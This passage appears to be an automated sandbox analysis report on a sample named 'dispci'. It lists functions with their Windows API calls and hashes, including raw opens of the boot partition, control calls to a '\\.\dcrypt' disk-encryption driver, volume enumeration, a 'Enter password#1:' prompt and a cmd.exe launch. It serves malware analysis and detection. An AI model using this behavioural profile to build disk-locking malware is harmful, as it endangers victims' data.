                                                                        • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • VirtualLock.KERNEL32(?,00000104), ref: 00DF53D9
                                                                        • Part of subcall function 00DF2340: VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00DF235D
                                                                        • Part of subcall function 00DF2340: TlsGetValue.KERNEL32(?), ref: 00DF2370
                                                                        • Part of subcall function 00DF2340: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2388
                                                                        • Part of subcall function 00DF2340: TlsSetValue.KERNEL32(?,00000000), ref: 00DF239D
                                                                        • Part of subcall function 00DF2340: DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00DF23B9
                                                                        • Part of subcall function 00DF2340: GetLastError.KERNEL32 ref: 00DF23C3
                                                                        • Part of subcall function 00DF2340: VirtualLock.KERNEL32(?,00000298), ref: 00DF23D6
                                                                        • Part of subcall function 00DF3820: TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00DF2463,?), ref: 00DF382D
                                                                        • Part of subcall function 00DF3820: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00DF2463,?), ref: 00DF3845
                                                                        • Part of subcall function 00DF3820: TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00DF2463,?), ref: 00DF385A
                                                                        • Part of subcall function 00DF3820: DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00DF3876
                                                                        • Part of subcall function 00DF3820: GetLastError.KERNEL32(?,?,?,?,00DF2463,?), ref: 00DF3880
                                                                        • Part of subcall function 00DF3820: VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00DF2463,?), ref: 00DF3894
                                                                        • Part of subcall function 00DF3820: VirtualUnlock.KERNEL32(?,?,?,?,?,?,00DF2463,?), ref: 00DF38C2
                                                                        • Part of subcall function 00DF3820: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00DF2463,?), ref: 00DF38D3
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000104,?,00000080), ref: 00DF5417
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000410,00E0A5B0,00000410,00000000,00000000), ref: 00DF5474
                                                                      • LocalFree.KERNEL32(?), ref: 00DF54E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Value$CreateFile$AllocByteCharControlDeviceErrorFreeLastLockMultiWide$LocalQueryUnlock
                                                                      • String ID:
                                                                      • API String ID: 1566722532-0
                                                                      • Opcode ID: f9e86dfea145f697066e57dd36f804535c308e92b5c3aab1bdcd492096093790
                                                                      • Instruction ID: eff70bc67fd79c8a8d9bbdd741a9cd6b2ca6327b24e089687fb086af2b5701ff
                                                                      • Opcode Fuzzy Hash: f9e86dfea145f697066e57dd36f804535c308e92b5c3aab1bdcd492096093790
                                                                      • Instruction Fuzzy Hash: 5441C8B5A0021C6BD72097659C46FFA7378DF44705F058094FB45AA1C5EAB1AEC48BB4
                                                                      Function 00DF4C90 Relevance: 7.6, APIs: 5, Instructions: 111synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4D04
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D0B
                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 00DF4D2B
                                                                      • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00DF4D82
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D89
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDeviceValue$ObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 4079559193-0
                                                                      • Opcode ID: 36e3cab02d1fd16874100267818dc8b44083ce281e561428b3e3fffe455d9c85
                                                                      • Instruction ID: 9aa4a24dc821c9b98cbd5928b4446ee50f8e73f2e98585b28431397bcfc80047
                                                                      • Opcode Fuzzy Hash: 36e3cab02d1fd16874100267818dc8b44083ce281e561428b3e3fffe455d9c85
                                                                      • Instruction Fuzzy Hash: 6431A3713043086FE2209BA9DC4ABBB77A9EB89B00F058919F645EB291DA70D904C7B5
                                                                      Function 00DF4CC9 Relevance: 7.6, APIs: 5, Instructions: 74synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4D04
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D0B
                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 00DF4D2B
                                                                      • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00DF4D82
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D89
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDeviceValue$ObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 4079559193-0
                                                                      • Opcode ID: d34b11627e76246bbeecc15c5c9bc06913137a331f4554b2e751616efe63c24f
                                                                      • Instruction ID: 45143cf75a2690a4ea6313403737ab3baff650f6765b11b3bf5aec4f322ce86c
                                                                      • Opcode Fuzzy Hash: d34b11627e76246bbeecc15c5c9bc06913137a331f4554b2e751616efe63c24f
                                                                      • Instruction Fuzzy Hash: C52180312043049FE324DBA5DC4ABBB77A8EB89B00F098908F645EA191DA70D944C771
                                                                      Function 00DFDDB8 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00DFDDC6
                                                                        • Part of subcall function 00DF5E86: __FF_MSGBANNER.LIBCMT ref: 00DF5E9F
                                                                        • Part of subcall function 00DF5E86: __NMSG_WRITE.LIBCMT ref: 00DF5EA6
                                                                        • Part of subcall function 00DF5E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1), ref: 00DF5ECB
                                                                      • _free.LIBCMT ref: 00DFDDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap_free_malloc
                                                                      • String ID:
                                                                      • API String ID: 2734353464-0
                                                                      • Opcode ID: 21b4f07e2af34b2d7c1b13ae587447620623696b4df50ca83cbdd49812ef2975
                                                                      • Instruction ID: cc552b0a1e88f8b5a96b31c8d0fe2f6c91dd1d011e6231e6a067fef51ff47620
                                                                      • Opcode Fuzzy Hash: 21b4f07e2af34b2d7c1b13ae587447620623696b4df50ca83cbdd49812ef2975
                                                                      • Instruction Fuzzy Hash: 9D11E73240571DAFCB313F75AC046BA3A97DB553A0F27C525FB88AA150DB35CA80D6B0
                                                                      Function 00DF9E8D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00DF9E99
                                                                        • Part of subcall function 00DFA0B6: __getptd_noexit.LIBCMT ref: 00DFA0B9
                                                                        • Part of subcall function 00DFA0B6: __amsg_exit.LIBCMT ref: 00DFA0C6
                                                                      • __getptd.LIBCMT ref: 00DF9EB0
                                                                      • __amsg_exit.LIBCMT ref: 00DF9EBE
                                                                      • __lock.LIBCMT ref: 00DF9ECE
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00DF9EE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                      • String ID:
                                                                      • API String ID: 938513278-0
                                                                      • Opcode ID: d769e2ad8f7476aea708113cd9e1b7b09efb40e8bd225d88c2b86de20c2c6229
                                                                      • Instruction ID: 67c3d99cca99aad6e03c873e5074e8dea9604c16585eb1f32332a304f694e9d3
                                                                      • Opcode Fuzzy Hash: d769e2ad8f7476aea708113cd9e1b7b09efb40e8bd225d88c2b86de20c2c6229
                                                                      • Instruction Fuzzy Hash: F1F06232D45A089AD721FB68550676AA3A0EF00724F17C10AF789A72C2DF744941CA76
                                                                      Function 00DF50B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00DF50CC
                                                                        • Part of subcall function 00DF2020: TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                        • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • VirtualLock.KERNEL32(?,00000104), ref: 00DF50FD
                                                                      • _wprintf.LIBCMT ref: 00DF511B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocCreateFileLockValue_wprintf
                                                                      • String ID: Enter password#1:
                                                                      • API String ID: 1727537069-3500599354
                                                                      • Opcode ID: 7c6c26825add5f3061ed5121423c516570f6de7b56e1f29135a9d290cdb0ff63
                                                                      • Instruction ID: 2ddc9762d53a211ff4fe7beb0487e005c9359bf3f90965d3ff5a825a574e72f4
                                                                      • Opcode Fuzzy Hash: 7c6c26825add5f3061ed5121423c516570f6de7b56e1f29135a9d290cdb0ff63
                                                                      • Instruction Fuzzy Hash: 6201D8B1F4171C77EA20B6A46C03BBF76589B00B14F058155FF05762C1DAB1968482F2
                                                                      Function 00DF3120 Relevance: 6.1, APIs: 4, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • _malloc.LIBCMT ref: 00DF3191
                                                                      • CloseHandle.KERNEL32 ref: 00DF329D
                                                                      • _free.LIBCMT ref: 00DF32A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                                                      • String ID:
                                                                      • API String ID: 496446412-0
                                                                      • Opcode ID: 5e759ba747b7e96e48c26b23fef2c23585da2cf6e56471f70f3bb7104aaa6cff
                                                                      • Instruction ID: b078f88b318fe39f5ff57cc6400a8461e562d2b048cb1202be832dafe3c64b5d
                                                                      • Opcode Fuzzy Hash: 5e759ba747b7e96e48c26b23fef2c23585da2cf6e56471f70f3bb7104aaa6cff
                                                                      • Instruction Fuzzy Hash: 2E41A7B190021C9BDB21DB54CC85AFE7379EB84350F1B81E9EE095B201DA359F858BB1
                                                                      Function 00DF2FB0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF35D0: _memset.LIBCMT ref: 00DF35FA
                                                                        • Part of subcall function 00DF35D0: CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00DF2DD3), ref: 00DF3616
                                                                      • _malloc.LIBCMT ref: 00DF305B
                                                                      • _free.LIBCMT ref: 00DF30DE
                                                                      • CloseHandle.KERNEL32 ref: 00DF30EF
                                                                      • _free.LIBCMT ref: 00DF30F6
                                                                        • Part of subcall function 00DF3AF0: __aullrem.LIBCMT ref: 00DF3B0A
                                                                        • Part of subcall function 00DF3AF0: _memmove.LIBCMT ref: 00DF3BBC
                                                                        • Part of subcall function 00DF3AF0: _free.LIBCMT ref: 00DF3BC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CloseCreateFileHandle__aullrem_malloc_memmove_memset
                                                                      • String ID:
                                                                      • API String ID: 3971761140-0
                                                                      • Opcode ID: 31a25d4f6f1d2d8d8059145968c29330c1dacd36e49189288c4571b962cef46b
                                                                      • Instruction ID: fbc7de45678504c240412b021af2b5804b71bcd31dcb5a8d35a952d8d8a9ca52
                                                                      • Opcode Fuzzy Hash: 31a25d4f6f1d2d8d8059145968c29330c1dacd36e49189288c4571b962cef46b
                                                                      • Instruction Fuzzy Hash: CF31D876A0011C9BDB20AA54DC415FEB3B8EF44360F0B81AAFE1997241DA35DF948BB1
                                                                      Function 00DFA68E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DFA6C2
                                                                      • __isleadbyte_l.LIBCMT ref: 00DFA6F5
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00DFA726
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00DFA794
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 17289a3b3e5c865faab26b9f4300b8673cb7e2debec1c3f39638124b1b1dc523
                                                                      • Instruction ID: 3dc5c99ed9fa78c637e5fca1a21ec100ff06714ee68cdcc44f79062141d0693e
                                                                      • Opcode Fuzzy Hash: 17289a3b3e5c865faab26b9f4300b8673cb7e2debec1c3f39638124b1b1dc523
                                                                      • Instruction Fuzzy Hash: 8731B1B1601249EFDB20EF68C880DBA3BB5AF01350B1EC569E66DDB191D730DD40DB62
                                                                      Function 00DF47E0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00DF4802
                                                                        • Part of subcall function 00DF20A0: TlsGetValue.KERNEL32(?), ref: 00DF20BD
                                                                        • Part of subcall function 00DF20A0: _wcschr.LIBCMT ref: 00DF20C8
                                                                        • Part of subcall function 00DF20A0: _wcschr.LIBCMT ref: 00DF20F8
                                                                        • Part of subcall function 00DF20A0: __snwprintf.LIBCMT ref: 00DF210C
                                                                        • Part of subcall function 00DF20A0: DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF213D
                                                                        • Part of subcall function 00DF20A0: DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00DF2196
                                                                      • FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00DF4889
                                                                      • GetLastError.KERNEL32 ref: 00DF488B
                                                                        • Part of subcall function 00DF22B0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00DF22D6
                                                                        • Part of subcall function 00DF22B0: GetLastError.KERNEL32(?,?,00000104), ref: 00DF22DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: FindVolume$ControlDeviceErrorLastNext_wcschr$FirstValue__snwprintf
                                                                      • String ID:
                                                                      • API String ID: 940178688-0
                                                                      • Opcode ID: 031aea96f773aa63d61813f34636029e81424802d31b5f2688458a25d6f662b2
                                                                      • Instruction ID: 69e0788984f7db04f2b03f880d78baa47e706809417c5316a4a76d99ade7ccd8
                                                                      • Opcode Fuzzy Hash: 031aea96f773aa63d61813f34636029e81424802d31b5f2688458a25d6f662b2
                                                                      • Instruction Fuzzy Hash: A921CC71A0020C8FDB10EB31DC456BF7775FB84311F4685A9E61AA7180DE319E48CFA0
                                                                      Function 00DF1710 Relevance: 6.1, APIs: 4, Instructions: 57memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileSizeEx.KERNEL32(?,?), ref: 00DF1723
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00DF1744
                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00DF175D
                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00DF1779
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocLocalPointerReadSize
                                                                      • String ID:
                                                                      • API String ID: 3779513235-0
                                                                      • Opcode ID: 2ce78a4edc008ba020863de3c62c4014706a567dd8049d0e7f2a4eec4ccf8556
                                                                      • Instruction ID: e0d30cd21385485237be524f7f887cc6425f8c5871748448e17570b3881adcfa
                                                                      • Opcode Fuzzy Hash: 2ce78a4edc008ba020863de3c62c4014706a567dd8049d0e7f2a4eec4ccf8556
                                                                      • Instruction Fuzzy Hash: 3C117074A00209EFDB10EFB68C49BBFB7BCEB04310F148955AA58E3140E770EA14CBA0
                                                                      Function 00DFFE23 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction ID: 8ca12a646594ffde0c572e513ce9737d0a1d9d3e4a9af0776bba0128f4a99140
                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                      • Instruction Fuzzy Hash: CF112E7240018EBB8F165F84DC41CEE3F62BF19794B5AC425FB6859031D736C9B1ABA1
                                                                      Function 00DFAD9E Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(00000000,00DF66A9), ref: 00DFADA1
                                                                      • __malloc_crt.LIBCMT ref: 00DFADD0
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DFADDD
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                                      • String ID:
                                                                      • API String ID: 237123855-0
                                                                      • Opcode ID: fdaf8724a798048410cac18e5edef758cbb979e3f8470a7a8de9cf9f3c226f8d
                                                                      • Instruction ID: 6127b0b17fb86bf3faf6ccca927d7cb0347a644fc4645ac3729ebab61078cd41
                                                                      • Opcode Fuzzy Hash: fdaf8724a798048410cac18e5edef758cbb979e3f8470a7a8de9cf9f3c226f8d
                                                                      • Instruction Fuzzy Hash: 83F089BB5011186ACF216739BC458BB5778DFD63A631FC417F949C3600F7208D8582B2
                                                                      Function 00DF5B90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      • CreateThread.KERNEL32(00000000,00000000,00DF5A50,00000000,00000000,00000000), ref: 00DF5BD8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
